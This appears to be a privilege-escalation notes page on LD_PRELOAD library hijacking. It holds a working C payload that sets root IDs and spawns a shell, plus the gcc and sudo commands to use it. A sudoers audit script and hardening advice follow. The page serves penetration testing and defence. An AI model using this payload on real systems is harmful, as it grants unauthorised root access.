Path Hijacking
Check if you can write into the path of privileged binaries; you might be able to abuse the library load order. Check which functions a binary uses via `objdump -T` (it lists the dynamic symbol table, i.e. the imports resolved at load time). To use these preload attacks with sudo, /etc/sudoers must keep the variable across the privilege change:

```
Defaults env_keep += LD_PRELOAD
```

Example payload (the library's `_init` runs when the loader maps it, before `main`):
```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setgid(), setuid() */

/* Runs at load time (built with -nostartfiles so _init is ours). */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't preload ourselves into the child */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
```
```sh
gcc -fPIC -shared -o payload.so payload.c -nostartfiles
sudo LD_PRELOAD=/tmp/payload.so <target>
```
When playing with the linker configs (/etc/ld.so.conf, /etc/ld.so.conf.d/), run `ldconfig` afterwards, or the linker cache (/etc/ld.so.cache) won't be updated.
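The two preconditions above (an `env_keep` that preserves `LD_PRELOAD`/`LD_LIBRARY_PATH`, and a writable directory on the linker's search path) are also what a defender audits for. The following POSIX sh script is an added example, not from the original page: it checks a sudoers file for the weak `env_keep` and lists any world-writable directory named in an ld.so.conf-style file. The file names and sample contents are constructed for the demo.

```sh
#!/bin/sh
# Added audit example (not from the original page). Checks the two
# preconditions of the LD_PRELOAD trick from a hardening point of view.

# sudoers_keeps_preload FILE
# Exit 0 if FILE has a Defaults env_keep line that preserves LD_PRELOAD
# or LD_LIBRARY_PATH, i.e. the sudo hardening is weakened.
sudoers_keeps_preload() {
    grep -Eq '^[[:space:]]*Defaults.*env_keep[[:space:]]*\+?=.*(LD_PRELOAD|LD_LIBRARY_PATH)' "$1"
}

# world_writable_lib_dirs CONF
# CONF lists library directories one per line (ld.so.conf style; blank
# lines and '#' comments are skipped). Prints each listed directory that
# exists and is world-writable (mode bit o+w), since a library dropped
# there would be picked up by ldconfig / the loader.
world_writable_lib_dirs() {
    while IFS= read -r dir; do
        case "$dir" in ''|'#'*) continue ;; esac
        [ -d "$dir" ] || continue
        # -prune stops find from descending; -perm -002 tests the o+w bit.
        find "$dir" -prune -type d -perm -002 2>/dev/null
    done < "$1"
}

# audit_demo: builds constructed sample inputs in a temp dir and runs
# both checks, printing findings. Returns 0 when at least one finding.
audit_demo() {
    tmp=$(mktemp -d) || return 2
    found=1
    # Constructed sudoers: the weak env_keep the page describes.
    printf 'Defaults env_reset\nDefaults env_keep += "LD_PRELOAD"\nroot ALL=(ALL) ALL\n' > "$tmp/sudoers"
    if sudoers_keeps_preload "$tmp/sudoers"; then
        echo "FINDING: $tmp/sudoers keeps LD_PRELOAD/LD_LIBRARY_PATH across sudo"
        found=0
    fi
    # Constructed library dirs: one world-writable, one not.
    mkdir "$tmp/lib_bad" "$tmp/lib_ok"
    chmod 0777 "$tmp/lib_bad"
    chmod 0755 "$tmp/lib_ok"
    printf '# constructed ld.so.conf\n%s\n%s\n' "$tmp/lib_bad" "$tmp/lib_ok" > "$tmp/ld.so.conf"
    for d in $(world_writable_lib_dirs "$tmp/ld.so.conf"); do
        echo "FINDING: world-writable library directory $d"
        found=0
    done
    rm -rf "$tmp"
    return $found
}

# Run the demo when executed directly.
audit_demo
```

The fix on the sudo side is to drop `LD_PRELOAD` and `LD_LIBRARY_PATH` from `env_keep` (sudo strips them by default when `env_reset` is in effect); on the filesystem side, directories in `ld.so.conf` should be root-owned and not group/world-writable, and `ldconfig` re-run after any change.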